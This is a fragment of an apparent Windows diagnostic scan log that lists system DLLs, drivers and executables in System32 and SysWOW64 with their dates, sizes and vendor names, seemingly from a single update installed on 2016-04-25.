2016-04-25 13:35 - 2016-03-29 09:14 - 00965632 _____ (Microsoft Corporation) C:\WINDOWS\system32\SRH.dll
2016-04-25 13:35 - 2016-03-29 09:14 - 00859136 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.ApplicationModel.Store.dll
2016-04-25 13:35 - 2016-03-29 09:13 - 00587776 _____ (Microsoft Corporation) C:\WINDOWS\system32\bisrv.dll
2016-04-25 13:35 - 2016-03-29 09:12 - 00471552 _____ (Microsoft Corporation) C:\WINDOWS\system32\NetSetupShim.dll
2016-04-25 13:35 - 2016-03-29 09:11 - 00988160 _____ (Microsoft Corporation) C:\WINDOWS\system32\NMAA.dll
2016-04-25 13:35 - 2016-03-29 09:11 - 00881664 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.UI.Input.Inking.dll
2016-04-25 13:35 - 2016-03-29 09:11 - 00161280 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\InstallAgent.exe
2016-04-25 13:35 - 2016-03-29 09:11 - 00059904 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\MosStorage.dll
2016-04-25 13:35 - 2016-03-29 09:10 - 01388544 _____ (Microsoft Corporation) C:\WINDOWS\system32\win32kbase.sys
2016-04-25 13:35 - 2016-03-29 09:10 - 00938496 _____ (Microsoft Corporation) C:\WINDOWS\system32\MapControlCore.dll
2016-04-25 13:35 - 2016-03-29 09:09 - 01239552 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Devices.Bluetooth.dll
2016-04-25 13:35 - 2016-03-29 09:07 - 01902592 _____ (Microsoft Corporation) C:\WINDOWS\system32\msxml3.dll
2016-04-25 13:35 - 2016-03-29 09:07 - 01213440 _____ (Microsoft Corporation) C:\WINDOWS\system32\wwansvc.dll
2016-04-25 13:35 - 2016-03-29 09:06 - 01575936 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Media.Speech.dll
2016-04-25 13:35 - 2016-03-29 09:06 - 00848896 _____ (Microsoft Corporation) C:\WINDOWS\system32\wuapi.dll
2016-04-25 13:35 - 2016-03-29 09:05 - 01395712 _____ (Microsoft Corporation) C:\WINDOWS\system32\UIAutomationCore.dll
2016-04-25 13:35 - 2016-03-29 09:02 - 02624512 _____ (Microsoft Corporation) C:\WINDOWS\system32\InputService.dll
2016-04-25 13:35 - 2016-03-29 09:02 - 01211904 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.UI.Cred.dll
2016-04-25 13:35 - 2016-03-29 09:02 - 00303104 _____ (Adobe Systems Incorporated) C:\WINDOWS\SysWOW64\atmfd.dll
2016-04-25 13:35 - 2016-03-29 09:00 - 00345600 _____ (Microsoft Corporation) C:\WINDOWS\system32\TextInputFramework.dll
2016-04-25 13:35 - 2016-03-29 09:00 - 00175616 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.UI.Core.TextInput.dll
2016-04-25 13:35 - 2016-03-29 08:56 - 00821760 _____ (Microsoft Corporation) C:\WINDOWS\system32\TokenBroker.dll
2016-04-25 13:35 - 2016-03-29 08:56 - 00415232 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\StoreAgent.dll
2016-04-25 13:35 - 2016-03-29 08:55 - 01052160 _____ (Microsoft Corporation) C:\WINDOWS\system32\MsSpellCheckingFacility.dll
2016-04-25 13:35 - 2016-03-29 08:48 - 00346624 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\MapConfiguration.dll
2016-04-25 13:35 - 2016-03-29 08:44 - 00498176 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\MessagingDataModel2.dll
2016-04-25 13:35 - 2016-03-29 08:43 - 00358400 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\AccountsRt.dll
2016-04-25 13:35 - 2016-03-29 08:42 - 01410560 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Web.Http.dll
2016-04-25 13:35 - 2016-03-29 08:40 - 00787456 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Web.dll
2016-04-25 13:35 - 2016-03-29 08:39 - 00350720 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\CredProvDataModel.dll
2016-04-25 13:35 - 2016-03-29 08:38 - 00800768 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\JpMapControl.dll
2016-04-25 13:35 - 2016-03-29 08:37 - 01444352 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\SRHInproc.dll
2016-04-25 13:35 - 2016-03-29 08:37 - 00799744 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\SRH.dll
2016-04-25 13:35 - 2016-03-29 08:36 - 03351040 _____ (Microsoft Corporation) C:\WINDOWS\system32\msi.dll
2016-04-25 13:35 - 2016-03-29 08:36 - 00649728 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.ApplicationModel.Store.dll
2016-04-25 13:35 - 2016-03-29 08:35 - 00354304 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\NetSetupShim.dll
2016-04-25 13:35 - 2016-03-29 08:34 - 00711680 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\MapControlCore.dll
2016-04-25 13:35 - 2016-03-29 08:34 - 00682496 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.UI.Input.Inking.dll
2016-04-25 13:35 - 2016-03-29 08:34 - 00418304 _____ (Microsoft Corporation) C:\WINDOWS\system32\dmenrollengine.dll
2016-04-25 13:35 - 2016-03-29 08:32 - 01588224 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msxml3.dll
2016-04-25 13:35 - 2016-03-29 08:32 - 01098240 _____ (Microsoft Corporation) C:\WINDOWS\system32\dosvc.dll
2016-04-25 13:35 - 2016-03-29 08:32 - 00162816 _____ (Microsoft Corporation) C:\WINDOWS\system32\enrollmentapi.dll
2016-04-25 13:35 - 2016-03-29 08:31 - 01117184 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Media.Speech.dll
2016-04-25 13:35 - 2016-03-29 08:30 - 01139712 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\UIAutomationCore.dll
2016-04-25 13:35 - 2016-03-29 08:28 - 01944576 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\InputService.dll
2016-04-25 13:35 - 2016-03-29 08:28 - 00764928 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.UI.Cred.dll
2016-04-25 13:35 - 2016-03-29 08:27 - 00245760 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\TextInputFramework.dll
2016-04-25 13:35 - 2016-03-29 08:27 - 00133632 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.UI.Core.TextInput.dll
2016-04-25 13:35 - 2016-03-29 08:23 - 00777728 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\MsSpellCheckingFacility.dll
2016-04-25 13:35 - 2016-03-29 08:22 - 00638464 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\TokenBroker.dll
2016-04-25 13:35 - 2016-03-29 08:19 - 02635776 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.UI.Logon.dll
2016-04-25 13:35 - 2016-03-29 08:17 - 00765952 _____ (Microsoft Corporation) C:\WINDOWS\system32\fveapi.dll
2016-04-25 13:35 - 2016-03-29 08:14 - 01072128 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Web.Http.dll
2016-04-25 13:35 - 2016-03-29 08:13 - 00592384 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Web.dll
2016-04-25 13:35 - 2016-03-29 08:10 - 03671040 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msi.dll
2016-04-25 13:35 - 2016-03-29 08:05 - 07199232 _____ (Microsoft Corporation) C:\WINDOWS\system32\BingMaps.dll
2016-04-25 13:35 - 2016-03-29 08:05 - 00361472 _____ (Microsoft Corporation) C:\WINDOWS\system32\bdesvc.dll
2016-04-25 13:35 - 2016-03-29 08:04 - 00688640 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Networking.Connectivity.dll
2016-04-25 13:35 - 2016-03-29 07:58 - 01799680 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.UI.Logon.dll
2016-04-25 13:35 - 2016-03-29 07:49 - 05202944 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\BingMaps.dll
2016-04-25 13:35 - 2016-03-29 07:45 - 03078144 _____ (Microsoft Corporation) C:\WINDOWS\system32\esent.dll
2016-04-25 13:35 - 2016-03-29 07:43 - 03428864 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Media.dll
2016-04-25 13:35 - 2016-03-29 07:43 - 00521728 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Networking.Connectivity.dll
2016-04-25 13:35 - 2016-03-29 07:38 - 02798080 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Media.dll
2016-04-25 13:35 - 2016-03-29 07:36 - 02722816 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\esent.dll
2016-04-25 13:35 - 2016-03-29 07:26 - 00958976 _____ (Microsoft Corporation) C:\WINDOWS\system32\RemoteNaturalLanguage.dll
2016-04-25 13:35 - 2016-03-29 07:25 - 00712704 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\RemoteNaturalLanguage.dll
2016-04-25 13:35 - 2016-03-01 07:31 - 00848168 _____ (Microsoft Corporation) C:\WINDOWS\system32\mfsvr.dll
2016-04-25 13:35 - 2016-03-01 07:22 - 00709688 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mfsvr.dll
2016-04-25 13:35 - 2016-02-24 11:52 - 01997328 _____ (Microsoft Corporation) C:\WINDOWS\system32\KernelBase.dll
2016-04-25 13:35 - 2016-02-24 11:34 - 01613664 _____ (Microsoft Corporation) C:\WINDOWS\system32\diagtrack.dll
2016-04-25 13:35 - 2016-02-24 11:28 - 03449168 _____ (Microsoft Corporation) C:\WINDOWS\system32\WSService.dll
2016-04-25 13:35 - 2016-02-24 11:15 - 01557768 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\KernelBase.dll
2016-04-25 13:35 - 2016-02-24 10:58 - 00794888 _____ (Microsoft Corporation) C:\WINDOWS\system32\mfds.dll
2016-04-25 13:35 - 2016-02-24 10:51 - 01322248 _____ (Microsoft Corporation) C:\WINDOWS\system32\ole32.dll
2016-04-25 13:35 - 2016-02-24 10:50 - 00808800 _____ (Microsoft Corporation) C:\WINDOWS\system32\WWAHost.exe
2016-04-25 13:35 - 2016-02-24 10:43 - 00625000 _____ (Microsoft Corporation) C:\WINDOWS\system32\ClipSVC.dll
2016-04-25 13:35 - 2016-02-24 10:19 - 00670928 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mfds.dll
2016-04-25 13:35 - 2016-02-24 10:14 - 00216416 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppxAllUserStore.dll
2016-04-25 13:35 - 2016-02-24 10:11 - 00957608 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ole32.dll
2016-04-25 13:35 - 2016-02-24 10:11 - 00703840 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\WWAHost.exe
2016-04-25 13:35 - 2016-02-24 10:11 - 00652392 _____ (Microsoft Corporation) C:\WINDOWS\system32\dxgi.dll
2016-04-25 13:35 - 2016-02-24 10:11 - 00394080 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\dxgmms1.sys
2016-04-25 13:35 - 2016-02-24 10:11 - 00258280 _____ (Microsoft Corporation) C:\WINDOWS\system32\sqmapi.dll
2016-04-25 13:35 - 2016-02-24 10:10 - 00576864 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\dxgmms2.sys
2016-04-25 13:35 - 2016-02-24 10:09 - 00640472 _____ (Microsoft Corporation) C:\WINDOWS\system32\wer.dll
2016-04-25 13:35 - 2016-02-24 09:38 - 00187744 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\AppxAllUserStore.dll
2016-04-25 13:35 - 2016-02-24 09:35 - 00523752 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dxgi.dll
2016-04-25 13:35 - 2016-02-24 09:35 - 00220064 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\sqmapi.dll
2016-04-25 13:35 - 2016-02-24 09:33 - 00538736 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wer.dll
2016-04-25 13:35 - 2016-02-24 09:20 - 00195072 _____ (Microsoft Corporation) C:\WINDOWS\system32\VCardParser.dll
2016-04-25 13:35 - 2016-02-24 09:02 - 00161280 _____ (Microsoft Corporation) C:\WINDOWS\system32\CallHistoryClient.dll
2016-04-25 13:35 - 2016-02-24 09:01 - 00146432 _____ (Microsoft Corporation) C:\WINDOWS\system32\AuthBroker.dll
2016-04-25 13:35 - 2016-02-24 08:59 - 00450560 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Internal.Bluetooth.dll
2016-04-25 13:35 - 2016-02-24 08:59 - 00360448 _____ (Microsoft Corporation) C:\WINDOWS\system32\vaultsvc.dll
2016-04-25 13:35 - 2016-02-24 08:55 - 00790528 _____ (Microsoft Corporation) C:\WINDOWS\system32\EmailApis.dll
2016-04-25 13:35 - 2016-02-24 08:54 - 00288768 _____ (Microsoft Corporation) C:\WINDOWS\system32\vaultcli.dll
2016-04-25 13:35 - 2016-02-24 08:52 - 00451584 _____ (Microsoft Corporation) C:\WINDOWS\system32\werui.dll
2016-04-25 13:35 - 2016-02-24 08:49 - 00726528 _____ (Microsoft Corporation) C:\WINDOWS\system32\ChatApis.dll
2016-04-25 13:35 - 2016-02-24 08:44 - 00915456 _____ (Microsoft Corporation) C:\WINDOWS\system32\configurationclient.dll
2016-04-25 13:35 - 2016-02-24 08:44 - 00700416 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppointmentApis.dll
2016-04-25 13:35 - 2016-02-24 08:43 - 00286720 _____ (Microsoft Corporation) C:\WINDOWS\system32\deviceaccess.dll
2016-04-25 13:35 - 2016-02-24 08:41 - 00982016 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppxPackaging.dll
2016-04-25 13:35 - 2016-02-24 08:41 - 00436736 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppXDeploymentClient.dll
2016-04-25 13:35 - 2016-02-24 08:40 - 01224704 _____ (Microsoft Corporation) C:\WINDOWS\system32\Unistore.dll
2016-04-25 13:35 - 2016-02-24 08:36 - 01847808 _____ (Microsoft Corporation) C:\WINDOWS\system32\WMPDMC.exe
2016-04-25 13:35 - 2016-02-24 08:34 - 00938496 _____ (Microsoft Corporation) C:\WINDOWS\system32\ContactApis.dll
2016-04-25 13:35 - 2016-02-24 08:32 - 00098304 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\AppointmentActivation.dll
2016-04-25 13:35 - 2016-02-24 08:28 - 00870912 _____ (Microsoft Corporation) C:\WINDOWS\system32\MPSSVC.dll
2016-04-25 13:35 - 2016-02-24 08:25 - 00401408 _____ (Microsoft Corporation) C:\WINDOWS\system32\sharemediacpl.dll
2016-04-25 13:35 - 2016-02-24 08:21 - 00315904 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Internal.Bluetooth.dll
2016-04-25 13:35 - 2016-02-24 08:18 - 01490432 _____ (Microsoft Corporation) C:\WINDOWS\system32\UserDataService.dll
2016-04-25 13:35 - 2016-02-24 08:18 - 00184832 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\PackageStateRoaming.dll
2016-04-25 13:35 - 2016-02-24 08:17 - 00369664 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\FirewallAPI.dll
2016-04-25 13:35 - 2016-02-24 08:13 - 00540160 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ChatApis.dll
2016-04-25 13:35 - 2016-02-24 08:09 - 00552960 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\AppointmentApis.dll
2016-04-25 13:35 - 2016-02-24 08:09 - 00228352 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\deviceaccess.dll
2016-04-25 13:35 - 2016-02-24 08:07 - 00949248 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Unistore.dll
2016-04-25 13:35 - 2016-02-24 08:07 - 00890368 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\AppxPackaging.dll
2016-04-25 13:35 - 2016-02-24 08:07 - 00342528 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\AppXDeploymentClient.dll
2016-04-25 13:35 - 2016-02-24 08:04 - 01497088 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\WMPDMC.exe
2016-04-25 13:35 - 2016-02-24 08:03 - 00769536 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ContactApis.dll
2016-04-25 13:35 - 2016-02-24 07:55 - 01996288 _____ (Microsoft Corporation) C:\WINDOWS\system32\ActiveSyncProvider.dll
2016-04-25 13:35 - 2016-02-24 07:34 - 01707520 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ActiveSyncProvider.dll
2016-04-25 13:35 - 2016-02-24 07:12 - 05321728 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Data.Pdf.dll
2016-04-25 13:35 - 2016-02-24 07:09 - 06972416 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Data.Pdf.dll
2016-04-25 13:35 - 2016-02-24 07:05 - 12586496 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wmp.dll
2016-04-25 13:35 - 2016-02-23 13:25 - 00563552 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\acpi.sys
2016-04-25 13:35 - 2016-02-23 13:15 - 00779384 _____ (Microsoft Corporation) C:\WINDOWS\system32\taskschd.dll
2016-04-25 13:35 - 2016-02-23 12:32 - 02544264 _____ (Microsoft Corporation) C:\WINDOWS\system32\mfcore.dll
2016-04-25 13:35 - 2016-02-23 12:32 - 01152328 _____ (Microsoft Corporation) C:\WINDOWS\system32\mfasfsrcsnk.dll
2016-04-25 13:35 - 2016-02-23 12:32 - 01062480 _____ (Microsoft Corporation) C:\WINDOWS\system32\mfmp4srcsnk.dll
2016-04-25 13:35 - 2016-02-23 12:32 - 00498448 _____ (Microsoft Corporation) C:\WINDOWS\system32\MFCaptureEngine.dll
2016-04-25 13:35 - 2016-02-23 12:31 - 01017032 _____ (Microsoft Corporation) C:\WINDOWS\system32\mfsrcsnk.dll
2016-04-25 13:35 - 2016-02-23 12:31 - 00819648 _____ (Microsoft Corporation) C:\WINDOWS\system32\mfmpeg2srcsnk.dll
2016-04-25 13:35 - 2016-02-23 12:31 - 00476728 _____ (Microsoft Corporation) C:\WINDOWS\system32\msvproc.dll
2016-04-25 13:35 - 2016-02-23 12:25 - 03671888 _____ (Microsoft Corporation) C:\WINDOWS\system32\iertutil.dll
2016-04-25 13:35 - 2016-02-23 12:22 - 00572272 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\taskschd.dll
2016-04-25 13:35 - 2016-02-23 11:45 - 02773096 _____ (Microsoft Corporation) C:\WINDOWS\system32\d3d11.dll
2016-04-25 13:35 - 2016-02-23 11:40 - 00430944 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\mrxsmb.sys
2016-04-25 13:35 - 2016-02-23 11:38 - 02180136 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mfcore.dll
2016-04-25 13:35 - 2016-02-23 11:38 - 00980352 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mfasfsrcsnk.dll
2016-04-25 13:35 - 2016-02-23 11:38 - 00895080 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mfsrcsnk.dll
2016-04-25 13:35 - 2016-02-23 11:38 - 00882720 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mfmp4srcsnk.dll
2016-04-25 13:35 - 2016-02-23 11:38 - 00450912 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\MFCaptureEngine.dll
2016-04-25 13:35 - 2016-02-23 11:38 - 00420928 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msvproc.dll
2016-04-25 13:35 - 2016-02-23 11:37 - 00713824 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mfmpeg2srcsnk.dll
2016-04-25 13:35 - 2016-02-23 11:32 - 00791744 _____ (Microsoft Corporation) C:\WINDOWS\system32\generaltel.dll
2016-04-25 13:35 - 2016-02-23 11:30 - 02919320 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\iertutil.dll
2016-04-25 13:35 - 2016-02-23 11:27 - 00376536 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Media.MediaControl.dll
2016-04-25 13:35 - 2016-02-23 11:20 - 01139712 _____ (Microsoft Corporation) C:\WINDOWS\system32\XblGameSave.dll
2016-04-25 13:35 - 2016-02-23 11:20 - 00238592 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\xboxgip.sys
2016-04-25 13:35 - 2016-02-23 11:17 - 00649216 _____ (Microsoft Corporation) C:\WINDOWS\system32\ngcsvc.dll
2016-04-25 13:35 - 2016-02-23 11:07 - 00037376 _____ (Microsoft Corporation) C:\WINDOWS\system32\LaunchWinApp.exe
2016-04-25 13:35 - 2016-02-23 11:06 - 00129536 _____ (Microsoft Corporation) C:\WINDOWS\system32\flvprophandler.dll
2016-04-25 13:35 - 2016-02-23 10:56 - 02186864 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\d3d11.dll
2016-04-25 13:35 - 2016-02-23 10:55 - 00114688 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\bridge.sys
2016-04-25 13:35 - 2016-02-23 10:53 - 00099328 _____ (Microsoft Corporation) C:\WINDOWS\system32\ngckeyenum.dll
2016-04-25 13:35 - 2016-02-23 10:52 - 00087040 _____ (Microsoft Corporation) C:\WINDOWS\system32\MDMAppInstaller.exe
2016-04-25 13:35 - 2016-02-23 10:50 - 00159232 _____ (Microsoft Corporation) C:\WINDOWS\system32\DeviceCensus.exe
2016-04-25 13:35 - 2016-02-23 10:40 - 00074240 _____ (Microsoft Corporation) C:\WINDOWS\system32\SMSRouter.dll
2016-04-25 13:35 - 2016-02-23 10:39 - 00178176 _____ (Microsoft Corporation) C:\WINDOWS\system32\psmsrv.dll
2016-04-25 13:35 - 2016-02-23 10:38 - 00320000 _____ (Microsoft Corporation) C:\WINDOWS\system32\MSFlacDecoder.dll
2016-04-25 13:35 - 2016-02-23 10:38 - 00287712 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Media.MediaControl.dll
2016-04-25 13:35 - 2016-02-23 10:37 - 00274944 _____ (Microsoft Corporation) C:\WINDOWS\system32\DisplayManager.dll
2016-04-25 13:35 - 2016-02-23 10:36 - 00216576 _____ (Microsoft Corporation) C:\WINDOWS\system32\QuickActionsDataModel.dll
2016-04-25 13:35 - 2016-02-23 10:34 - 00305664 _____ (Microsoft Corporation) C:\WINDOWS\system32\wifiprofilessettinghandler.dll
2016-04-25 13:35 - 2016-02-23 10:34 - 00189952 _____ (Microsoft Corporation) C:\WINDOWS\system32\WiFiDisplay.dll
2016-04-25 13:35 - 2016-02-23 10:31 - 00463360 _____ (Microsoft Corporation) C:\WINDOWS\system32\wlansec.dll
2016-04-25 13:35 - 2016-02-23 10:29 - 00591872 _____ (Microsoft Corporation) C:\WINDOWS\system32\SmsRouterSvc.dll
2016-04-25 13:35 - 2016-02-23 10:27 - 00307712 _____ (Microsoft Corporation) C:\WINDOWS\system32\usbmon.dll
2016-04-25 13:35 - 2016-02-23 10:26 - 00372224 _____ (Microsoft Corporation) C:\WINDOWS\system32\MDEServer.exe
2016-04-25 13:35 - 2016-02-23 10:22 - 00567808 _____ (Microsoft Corporation) C:\WINDOWS\system32\MCRecvSrc.dll
2016-04-25 13:35 - 2016-02-23 10:20 - 00847360 _____ (Microsoft Corporation) C:\WINDOWS\system32\netlogon.dll
2016-04-25 13:35 - 2016-02-23 10:20 - 00606720 _____ (Microsoft Corporation) C:\WINDOWS\system32\wcmsvc.dll
2016-04-25 13:35 - 2016-02-23 10:20 - 00493568 _____ (Microsoft Corporation) C:\WINDOWS\system32\mfmkvsrcsnk.dll
2016-04-25 13:35 - 2016-02-23 10:19 - 00517632 _____ (Microsoft Corporation) C:\WINDOWS\system32\winspool.drv
2016-04-25 13:35 - 2016-02-23 10:14 - 00828928 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.AccountsControl.dll
2016-04-25 13:35 - 2016-02-23 10:14 - 00029696 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\LaunchWinApp.exe
2016-04-25 13:35 - 2016-02-23 10:10 - 00997376 _____ (Microsoft Corporation) C:\WINDOWS\system32\schedsvc.dll
2016-04-25 13:35 - 2016-02-23 10:09 - 00870400 _____ (Microsoft Corporation) C:\WINDOWS\system32\modernexecserver.dll
2016-04-25 13:35 - 2016-02-23 10:04 - 01131520 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Media.Audio.dll
2016-04-25 13:35 - 2016-02-23 10:04 - 00673792 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.UI.dll
2016-04-25 13:35 - 2016-02-23 10:04 - 00382464 _____ (Microsoft Corporation) C:\WINDOWS\system32\wuuhext.dll
2016-04-25 13:35 - 2016-02-23 10:02 - 01318912 _____ (Microsoft Corporation) C:\WINDOWS\system32\wifinetworkmanager.dll
2016-04-25 13:35 - 2016-02-23 10:02 - 00755712 _____ (Microsoft Corporation) C:\WINDOWS\system32\spoolsv.exe
2016-04-25 13:35 - 2016-02-23 09:58 - 00163840 _____ (Microsoft Corporation) C:\WINDOWS\system32\TimeBrokerServer.dll
2016-04-25 13:35 - 2016-02-23 09:50 - 00266752 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\MSFlacDecoder.dll
2016-04-25 13:35 - 2016-02-23 09:49 - 00200704 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\DisplayManager.dll
2016-04-25 13:35 - 2016-02-23 09:48 - 00838144 _____ (Microsoft Corporation) C:\WINDOWS\system32\uDWM.dll
2016-04-25 13:35 - 2016-02-23 09:47 - 00157184 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\WiFiDisplay.dll
2016-04-25 13:35 - 2016-02-23 09:38 - 00480256 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\MCRecvSrc.dll
2016-04-25 13:35 - 2016-02-23 09:37 - 01118208 _____ (Microsoft Corporation) C:\WINDOWS\system32\localspl.dll
2016-04-25 13:35 - 2016-02-23 09:37 - 00613376 _____ (Microsoft Corporation) C:\WINDOWS\system32\SettingSync.dll
2016-04-25 13:35 - 2016-02-23 09:36 - 00713728 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\netlogon.dll
2016-04-25 13:35 - 2016-02-23 09:36 - 00379392 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mfmkvsrcsnk.dll
2016-04-25 13:35 - 2016-02-23 09:35 - 00400896 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\winspool.drv
2016-04-25 13:35 - 2016-02-23 09:31 - 00585216 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.AccountsControl.dll
2016-04-25 13:35 - 2016-02-23 09:24 - 04827136 _____ (Microsoft Corporation) C:\WINDOWS\system32\ExplorerFrame.dll
2016-04-25 13:35 - 2016-02-23 09:24 - 01105920 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Media.Audio.dll
2016-04-25 13:35 - 2016-02-23 09:24 - 00489984 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.UI.dll
2016-04-25 13:35 - 2016-02-23 09:14 - 00990720 _____ (Microsoft Corporation) C:\WINDOWS\system32\SettingSyncCore.dll
2016-04-25 13:35 - 2016-02-23 09:05 - 00503296 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\SettingSync.dll
2016-04-25 13:35 - 2016-02-23 09:01 - 02295808 _____ (Microsoft Corporation) C:\WINDOWS\system32\wlansvc.dll
2016-04-25 13:35 - 2016-02-23 08:56 - 04412928 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ExplorerFrame.dll
2016-04-25 13:35 - 2016-02-23 08:51 - 00754176 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\SettingSyncCore.dll
2016-04-25 13:35 - 2016-02-23 08:41 - 02912256 _____ (Microsoft Corporation) C:\WINDOWS\system32\CertEnroll.dll
2016-04-25 13:35 - 2016-02-23 08:39 - 02581504 _____ (Microsoft Corporation) C:\WINDOWS\system32\MFMediaEngine.dll
2016-04-25 13:35 - 2016-02-23 08:35 - 07533568 _____ (Microsoft Corporation) C:\WINDOWS\system32\mstscax.dll
2016-04-25 13:35 - 2016-02-23 08:33 - 02604032 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\CertEnroll.dll
2016-04-25 13:35 - 2016-02-23 08:30 - 02061312 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\MFMediaEngine.dll
2016-04-25 13:35 - 2016-02-23 08:28 - 06740992 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mstscax.dll
2016-04-25 13:35 - 2016-02-09 05:18 - 00297472 _____ (Microsoft Corporation) C:\WINDOWS\system32\thumbcache.dll
2016-04-25 13:35 - 2016-02-09 05:18 - 00237056 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\thumbcache.dll
2016-04-25 13:35 - 2016-02-09 05:07 - 00086016 _____ (Microsoft Corporation) C:\WINDOWS\system32\DeviceEnroller.exe
